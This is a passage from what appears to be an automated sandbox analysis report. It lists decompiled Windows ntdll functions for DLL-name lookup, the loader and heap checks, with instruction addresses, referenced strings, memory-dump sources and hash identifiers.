						L00CB3F92(0x33, 0, "[%x.%x] SXS: %s - Relative redirection plus env var expansion.\n",  *((intOrPtr*)( *[fs:0x18] + 0x20)));
						goto L48;
					}
					__eflags = _v116 & 0x00000001;
					if((_v116 & 0x00000001) != 0) {
						__eflags = _v116 & 0x00000002;
						if((_v116 & 0x00000002) != 0) {
							_push("!(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT)");
							_push(0x416);
							goto L74;
						}
						_t303 = 1;
					}
					__eflags = _v116 & 0x00000002;
					if((_v116 & 0x00000002) != 0) {
						_t303 = _t303 | 0x00000002;
					}
					_t283 = E00C8C507(_t303, _v124, _v120,  &_v60, 0xc8cdad,  &_v48);
					__eflags = _t283;
					if(_t283 < 0) {
						__eflags = _t283 - 0xc0000120;
						if(_t283 == 0xc0000120) {
							__eflags = _v48;
							if(_v48 < 0) {
								_t283 = _v48;
							}
						}
						goto L2;
					} else {
						goto L22;
					}
				}
				if(_t283 == 0xc0150001) {
					_t283 = _t283 + 7;
				}
				goto L2;
			}















































































                                                                                                                                                    0x00c6f3cf
                                                                                                                                                    0x00c6f3da
                                                                                                                                                    0x00c6f3e1
                                                                                                                                                    0x00c6f3eb
                                                                                                                                                    0x00c6f3f4
                                                                                                                                                    0x00c6f3f9
                                                                                                                                                    0x00c6f3fb
                                                                                                                                                    0x00c6f3fe
                                                                                                                                                    0x00c6f408
                                                                                                                                                    0x00c6f40f
                                                                                                                                                    0x00c6f412
                                                                                                                                                    0x00c6f41a
                                                                                                                                                    0x00c6f41d
                                                                                                                                                    0x00c6f420
                                                                                                                                                    0x00c6f423
                                                                                                                                                    0x00c6f42b
                                                                                                                                                    0x00c6f42e
                                                                                                                                                    0x00c6f42f
                                                                                                                                                    0x00c6f433
                                                                                                                                                    0x00c6f439
                                                                                                                                                    0x00c6f444
                                                                                                                                                    0x00c6f44e
                                                                                                                                                    0x00c6f451
                                                                                                                                                    0x00c6f454
                                                                                                                                                    0x00c6f457
                                                                                                                                                    0x00c6f45f
                                                                                                                                                    0x00c6f463
                                                                                                                                                    0x00c8c2bb
                                                                                                                                                    0x00c8c2bf
                                                                                                                                                    0x00c8c4fb
                                                                                                                                                    0x00c8c4fb
                                                                                                                                                    0x00c6f475
                                                                                                                                                    0x00c6f475
                                                                                                                                                    0x00c6f478
                                                                                                                                                    0x00c6f47d
                                                                                                                                                    0x00c6f481
                                                                                                                                                    0x00cc3bf8
                                                                                                                                                    0x00cc3bfb
                                                                                                                                                    0x00cc3c00
                                                                                                                                                    0x00cc3c00
                                                                                                                                                    0x00c6f48a
                                                                                                                                                    0x00c6f48d
                                                                                                                                                    0x00c6f48d
                                                                                                                                                    0x00c6f490
                                                                                                                                                    0x00c6f495
                                                                                                                                                    0x00c6f499
                                                                                                                                                    0x00c6f499
                                                                                                                                                    0x00c6f4a2
                                                                                                                                                    0x00c6f4a6
                                                                                                                                                    0x00c6f4aa
                                                                                                                                                    0x00c6f4ae
                                                                                                                                                    0x00c7e238
                                                                                                                                                    0x00c7e238
                                                                                                                                                    0x00c6f4c3
                                                                                                                                                    0x00c6f4c3
                                                                                                                                                    0x00c8c2c5
                                                                                                                                                    0x00c8c2cf
                                                                                                                                                    0x00c8c2d2
                                                                                                                                                    0x00ca4327
                                                                                                                                                    0x00ca4327
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00ca4327
                                                                                                                                                    0x00c8c2d8
                                                                                                                                                    0x00c8c2df
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00c8c2e5
                                                                                                                                                    0x00c8c2eb
                                                                                                                                                    0x00c8c2ee
                                                                                                                                                    0x00c8c2f1
                                                                                                                                                    0x00c8c2f3
                                                                                                                                                    0x00c8c2f6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00c8c2fc
                                                                                                                                                    0x00c8c2ff
                                                                                                                                                    0x00c8c302
                                                                                                                                                    0x00c8c304
                                                                                                                                                    0x00c8c30a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00c8c310
                                                                                                                                                    0x00c8c318
                                                                                                                                                    0x00c8c31a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00c8c320
                                                                                                                                                    0x00c8c322
                                                                                                                                                    0x00c8c325
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00c8c32b
                                                                                                                                                    0x00c8c32e
                                                                                                                                                    0x00c8c331
                                                                                                                                                    0x00c8c333
                                                                                                                                                    0x00c8c335
                                                                                                                                                    0x00c8c37b
                                                                                                                                                    0x00c8c383
                                                                                                                                                    0x00c8c386
                                                                                                                                                    0x00c8c388
                                                                                                                                                    0x00c8c38a
                                                                                                                                                    0x00c8c38c
                                                                                                                                                    0x00c8c38f
                                                                                                                                                    0x00c8c391
                                                                                                                                                    0x00c8c391
                                                                                                                                                    0x00c8c394
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc3c35
                                                                                                                                                    0x00cc3c39
                                                                                                                                                    0x00cc3c3b
                                                                                                                                                    0x00cc3c3e
                                                                                                                                                    0x00cc3c41
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc3c4a
                                                                                                                                                    0x00cc3c4d
                                                                                                                                                    0x00cc3c4f
                                                                                                                                                    0x00cc3c51
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc3c5c
                                                                                                                                                    0x00cc3c5f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc3c68
                                                                                                                                                    0x00cc3c6d
                                                                                                                                                    0x00cc3c6e
                                                                                                                                                    0x00cc3c6e
                                                                                                                                                    0x00c8c39a
                                                                                                                                                    0x00c8c39d
                                                                                                                                                    0x00c8c39f
                                                                                                                                                    0x00c8c3a4
                                                                                                                                                    0x00c8c3a4
                                                                                                                                                    0x00c8c3a4
                                                                                                                                                    0x00c8c3a9
                                                                                                                                                    0x00c8c3ac
                                                                                                                                                    0x00c8c3b1
                                                                                                                                                    0x00cc3dae
                                                                                                                                                    0x00cc3dae
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00c8c3b7
                                                                                                                                                    0x00c8c3b7
                                                                                                                                                    0x00c8c3ba
                                                                                                                                                    0x00c8c3bc
                                                                                                                                                    0x00cc3c76
                                                                                                                                                    0x00cc3c7a
                                                                                                                                                    0x00cc3c7f
                                                                                                                                                    0x00cc3c81
                                                                                                                                                    0x00cc3c8d
                                                                                                                                                    0x00c8c3cb
                                                                                                                                                    0x00c8c3cd
                                                                                                                                                    0x00c8c3d4
                                                                                                                                                    0x00c8c3d8
                                                                                                                                                    0x00c8c3da
                                                                                                                                                    0x00c8c445
                                                                                                                                                    0x00c8c445
                                                                                                                                                    0x00c8c449
                                                                                                                                                    0x00c8c44d
                                                                                                                                                    0x00cc3caa
                                                                                                                                                    0x00cc3cad
                                                                                                                                                    0x00cc3cb0
                                                                                                                                                    0x00cc3cb8
                                                                                                                                                    0x00cc3cbe
                                                                                                                                                    0x00cc3cc5
                                                                                                                                                    0x00cc3cc9
                                                                                                                                                    0x00cc3cce
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc3cd7
                                                                                                                                                    0x00cc3cd9
                                                                                                                                                    0x00cc3ce0
                                                                                                                                                    0x00cc3ce7
                                                                                                                                                    0x00cc3cec
                                                                                                                                                    0x00cc3cee
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc3cf0
                                                                                                                                                    0x00cc3cfd
                                                                                                                                                    0x00cc3d05
                                                                                                                                                    0x00cc3d0d
                                                                                                                                                    0x00cc3d11
                                                                                                                                                    0x00cc3d20
                                                                                                                                                    0x00cc3d24
                                                                                                                                                    0x00cc3d27
                                                                                                                                                    0x00cc3d29
                                                                                                                                                    0x00cc3d2c
                                                                                                                                                    0x00cc3d2f
                                                                                                                                                    0x00cc3d36
                                                                                                                                                    0x00cc3d39
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc3d3f
                                                                                                                                                    0x00cc3cdb
                                                                                                                                                    0x00cc3cde
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc3cde
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc3caa
                                                                                                                                                    0x00c8c453
                                                                                                                                                    0x00c8c456
                                                                                                                                                    0x00c8c458
                                                                                                                                                    0x00c8c45b
                                                                                                                                                    0x00c8c45d
                                                                                                                                                    0x00c8c4e4
                                                                                                                                                    0x00c8c4e7
                                                                                                                                                    0x00c8c4ea
                                                                                                                                                    0x00cc3dce
                                                                                                                                                    0x00cc3dd3
                                                                                                                                                    0x00cc3dda
                                                                                                                                                    0x00cc3ddc
                                                                                                                                                    0x00cc3dde
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc3de6
                                                                                                                                                    0x00cc3ded
                                                                                                                                                    0x00cc3df0
                                                                                                                                                    0x00cc3df5
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc3df7
                                                                                                                                                    0x00cc3dfa
                                                                                                                                                    0x00cc3dfc
                                                                                                                                                    0x00cc3e03
                                                                                                                                                    0x00cc3e07
                                                                                                                                                    0x00cc3e0c
                                                                                                                                                    0x00cc3e0e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc3e14
                                                                                                                                                    0x00cc3e23
                                                                                                                                                    0x00cc3e2a
                                                                                                                                                    0x00cc3e32
                                                                                                                                                    0x00cc3e36
                                                                                                                                                    0x00cc3e43
                                                                                                                                                    0x00cc3e4f
                                                                                                                                                    0x00cc3e51
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc3e51
                                                                                                                                                    0x00cc3dfe
                                                                                                                                                    0x00cc3e01
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc3e01
                                                                                                                                                    0x00c8c4f0
                                                                                                                                                    0x00c8c4f0
                                                                                                                                                    0x00c8c4f3
                                                                                                                                                    0x00c8c4f5
                                                                                                                                                    0x00cc3e5a
                                                                                                                                                    0x00cc3e5a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00c8c4f5
                                                                                                                                                    0x00c8c463
                                                                                                                                                    0x00c8c465
                                                                                                                                                    0x00cc3d58
                                                                                                                                                    0x00cc3d5a
                                                                                                                                                    0x00cc3d5c
                                                                                                                                                    0x00cc3d98
                                                                                                                                                    0x00cc3da6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc3da6
                                                                                                                                                    0x00cc3d5e
                                                                                                                                                    0x00cc3d64
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc3d6a
                                                                                                                                                    0x00cc3d6f
                                                                                                                                                    0x00cc3d74
                                                                                                                                                    0x00cc3d74
                                                                                                                                                    0x00cc3d79
                                                                                                                                                    0x00cc3d7e
                                                                                                                                                    0x00cc3d83
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc3d83
                                                                                                                                                    0x00c8c46b
                                                                                                                                                    0x00c8c46b
                                                                                                                                                    0x00c8c46f
                                                                                                                                                    0x00c8c471
                                                                                                                                                    0x00c8c477
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00c8c480
                                                                                                                                                    0x00c8c484
                                                                                                                                                    0x00c8c489
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00c8c48f
                                                                                                                                                    0x00c8c492
                                                                                                                                                    0x00c8c494
                                                                                                                                                    0x00cc3db8
                                                                                                                                                    0x00cc3dbc
                                                                                                                                                    0x00cc3dc1
                                                                                                                                                    0x00cc3dc3
                                                                                                                                                    0x00c8c4a3
                                                                                                                                                    0x00c8c4b2
                                                                                                                                                    0x00c8c4b9
                                                                                                                                                    0x00c8c4c1
                                                                                                                                                    0x00c8c4c5
                                                                                                                                                    0x00c8c4d2
                                                                                                                                                    0x00c8c4db
                                                                                                                                                    0x00c8c4de
                                                                                                                                                    0x00c8c4de
                                                                                                                                                    0x00c8c4e0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00c8c4e0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc3dc9
                                                                                                                                                    0x00c8c49a
                                                                                                                                                    0x00c8c49d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00c8c49d
                                                                                                                                                    0x00c8c3de
                                                                                                                                                    0x00c8c3e4
                                                                                                                                                    0x00c8c3e7
                                                                                                                                                    0x00c8c3ec
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00c8c3f2
                                                                                                                                                    0x00c8c3f4
                                                                                                                                                    0x00cc3c95
                                                                                                                                                    0x00cc3c99
                                                                                                                                                    0x00cc3c9e
                                                                                                                                                    0x00cc3ca0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc3ca2
                                                                                                                                                    0x00c8c403
                                                                                                                                                    0x00c8c405
                                                                                                                                                    0x00c8c418
                                                                                                                                                    0x00c8c420
                                                                                                                                                    0x00c8c426
                                                                                                                                                    0x00c8c42d
                                                                                                                                                    0x00c8c434
                                                                                                                                                    0x00c8c43a
                                                                                                                                                    0x00c8c43f
                                                                                                                                                    0x00c8c43f
                                                                                                                                                    0x00c8c441
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00c8c441
                                                                                                                                                    0x00c8c3fa
                                                                                                                                                    0x00c8c3fd
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00c8c3fd
                                                                                                                                                    0x00cc3c83
                                                                                                                                                    0x00cc3c83
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc3c83
                                                                                                                                                    0x00c8c3c2
                                                                                                                                                    0x00c8c3c5
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00c8c3c5
                                                                                                                                                    0x00c8c3b1
                                                                                                                                                    0x00c8c337
                                                                                                                                                    0x00c8c339
                                                                                                                                                    0x00c8c33c
                                                                                                                                                    0x00c8c33e
                                                                                                                                                    0x00cc3bce
                                                                                                                                                    0x00cc3bd3
                                                                                                                                                    0x00cc3be7
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc3bec
                                                                                                                                                    0x00c8c344
                                                                                                                                                    0x00c8c348
                                                                                                                                                    0x00c9c1a5
                                                                                                                                                    0x00c9c1a9
                                                                                                                                                    0x00cc3c08
                                                                                                                                                    0x00cc3c0d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc3c0d
                                                                                                                                                    0x00c9c1b1
                                                                                                                                                    0x00c9c1b1
                                                                                                                                                    0x00c8c34e
                                                                                                                                                    0x00c8c352
                                                                                                                                                    0x00ca431f
                                                                                                                                                    0x00ca431f
                                                                                                                                                    0x00c8c371
                                                                                                                                                    0x00c8c373
                                                                                                                                                    0x00c8c375
                                                                                                                                                    0x00cc3c17
                                                                                                                                                    0x00cc3c1d
                                                                                                                                                    0x00cc3c23
                                                                                                                                                    0x00cc3c27
                                                                                                                                                    0x00cc3c2d
                                                                                                                                                    0x00cc3c2d
                                                                                                                                                    0x00cc3c27
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00c8c375
                                                                                                                                                    0x00c6f46f
                                                                                                                                                    0x00cc3bc0
                                                                                                                                                    0x00cc3bc0
                                                                                                                                                    0x00000000

                                                                                                                                                    Strings
                                                                                                                                                    • Status != STATUS_NOT_FOUND, xrefs: 00CC3D6A
                                                                                                                                                    • d:\w7rtm\minkernel\ntdll\sxsisol.cpp, xrefs: 00CC3D74
                                                                                                                                                    • @, xrefs: 00C6F3FE
                                                                                                                                                    • sxsisol_SearchActCtxForDllName, xrefs: 00CC3BCE
                                                                                                                                                    • [%x.%x] SXS: %s - Relative redirection plus env var expansion., xrefs: 00CC3BDF
                                                                                                                                                    • !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT), xrefs: 00CC3C08
                                                                                                                                                    • Internal error check failed, xrefs: 00CC3D79
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT)$@$Internal error check failed$Status != STATUS_NOT_FOUND$[%x.%x] SXS: %s - Relative redirection plus env var expansion.$d:\w7rtm\minkernel\ntdll\sxsisol.cpp$sxsisol_SearchActCtxForDllName
                                                                                                                                                    • API String ID: 0-4103935307
                                                                                                                                                    • Opcode ID: 226a0ea36922ea1163405ce43f82fb251c58d6408d1b543f1243d93811739b12
                                                                                                                                                    • Instruction ID: 320b60c94ce48af17daea47a326b5a0ec14b88de2d717997982abd8672e4c935
                                                                                                                                                    • Opcode Fuzzy Hash: 226a0ea36922ea1163405ce43f82fb251c58d6408d1b543f1243d93811739b12
                                                                                                                                                    • Instruction Fuzzy Hash: 1902BF70A00209DBDB24DFA9D881AFEB7F0FF48704F20852DE956EB651E7749A45DB20
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00C7E6C1, Relevance: 5.6, Strings: 4, Instructions: 626COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: DLL name: %wZ DLL path: %wZ$LdrpFindOrMapDll$Status: 0x%08lx$d:\w7rtm\minkernel\ntdll\ldrfind.c
                                                                                                                                                    • API String ID: 0-1394473639
                                                                                                                                                    • Opcode ID: dd29ce84d5082c4b5ea120d619c7cbd4df4e577bbf0fe0e343300c0ab625a5a3
                                                                                                                                                    • Instruction ID: 2c5b89400fe8fd06e219a1c76695cf79cbbc5a45c26131da1152bdffa719d4c8
                                                                                                                                                    • Opcode Fuzzy Hash: dd29ce84d5082c4b5ea120d619c7cbd4df4e577bbf0fe0e343300c0ab625a5a3
                                                                                                                                                    • Instruction Fuzzy Hash: 6232AE72900208EFDF21DFA4C884BEEBBF9BF09304F14806AF955A7261D7709A45EB50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00C77353, Relevance: 5.5, Strings: 4, Instructions: 466COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 00CBDABE
                                                                                                                                                    • HEAP: , xrefs: 00CBDAB3, 00CBDB9B
                                                                                                                                                    • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 00CBDBA6
                                                                                                                                                    • HEAP[%wZ]: , xrefs: 00CBDAA6, 00CBDB8E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                                                                                                    • API String ID: 0-1657114761
                                                                                                                                                    • Opcode ID: 734b3d00f02cf8d8e9d188ebebf4e599800a7cc2c67c1c941a38baa3d53dbcd2
                                                                                                                                                    • Instruction ID: cebc9397bb52b71086c4bedd15abffcee71c1323c49ce5662669b4a7f83e8f3a
                                                                                                                                                    • Opcode Fuzzy Hash: 734b3d00f02cf8d8e9d188ebebf4e599800a7cc2c67c1c941a38baa3d53dbcd2
                                                                                                                                                    • Instruction Fuzzy Hash: D602D07160864ACFCB28CF69C484BB9B7F1FF44304F258259E45A8B691E734EE81DB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00C7351F, Relevance: 5.1, Strings: 3, Instructions: 1392COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    • HEAP: Free Heap block %lx modified at %lx after it was freed, xrefs: 00CCA4AC
                                                                                                                                                    • HEAP: , xrefs: 00CCA498
                                                                                                                                                    • HEAP[%wZ]: , xrefs: 00CCA48B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: HEAP: $HEAP: Free Heap block %lx modified at %lx after it was freed$HEAP[%wZ]:
                                                                                                                                                    • API String ID: 0-2419525547
                                                                                                                                                    • Opcode ID: 62d82886426971c479911199d761ce6431525566813ebaa681f60451740993f8
                                                                                                                                                    • Instruction ID: 726c01567aafe0897e36708ae9fceda92f41d587790e86a5a81362f74ee75615
                                                                                                                                                    • Opcode Fuzzy Hash: 62d82886426971c479911199d761ce6431525566813ebaa681f60451740993f8
                                                                                                                                                    • Instruction Fuzzy Hash: 3DC2AC71600256CFCB18CF19C498A7A77B1FF94314B29C1A9ECAA9B355D730EE41DB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00C73040, Relevance: 4.8, Strings: 3, Instructions: 1098COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    • HEAP: Free Heap block %lx modified at %lx after it was freed, xrefs: 00CCACD9
                                                                                                                                                    • HEAP: , xrefs: 00CCACC2
                                                                                                                                                    • HEAP[%wZ]: , xrefs: 00CCACB5
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: HEAP: $HEAP: Free Heap block %lx modified at %lx after it was freed$HEAP[%wZ]:
                                                                                                                                                    • API String ID: 0-2419525547
                                                                                                                                                    • Opcode ID: acd6c6dd537754ffdf80ae69f652347b2d099040ea32336bb5c8d852161ecbe9
                                                                                                                                                    • Instruction ID: 33bb669bcec3a0ba794d55ba8a0df119e8dc3c35c8ae9a75df10a74834417c1d
                                                                                                                                                    • Opcode Fuzzy Hash: acd6c6dd537754ffdf80ae69f652347b2d099040ea32336bb5c8d852161ecbe9
                                                                                                                                                    • Instruction Fuzzy Hash: 11A2B070904259CFDB29CF65C484BADBBB1FF44304F14819EE8AA9B296D730AE81DF51
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00C7C85C, Relevance: 4.6, Strings: 3, Instructions: 858COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    • Unable to release memory at %p for %p bytes - Status == %x, xrefs: 00CCDC30
                                                                                                                                                    • HEAP: , xrefs: 00CCDC1C
                                                                                                                                                    • HEAP[%wZ]: , xrefs: 00CCDC0F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %p bytes - Status == %x
                                                                                                                                                    • API String ID: 0-212623055
                                                                                                                                                    • Opcode ID: 1b5a7b3e6bf45a393cf328234379d342b1dc2d006227ce2b5284e3bae6d29dec
                                                                                                                                                    • Instruction ID: 33699ab5a7e9c548d512881bb97d960d90b9a89acd1e1ebe0b5e1d66a605888e
                                                                                                                                                    • Opcode Fuzzy Hash: 1b5a7b3e6bf45a393cf328234379d342b1dc2d006227ce2b5284e3bae6d29dec
                                                                                                                                                    • Instruction Fuzzy Hash: B772D47190025A9FDB24CF69C885BBDBBF0FF09314F14805DE9AAAB291D734A941EF50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

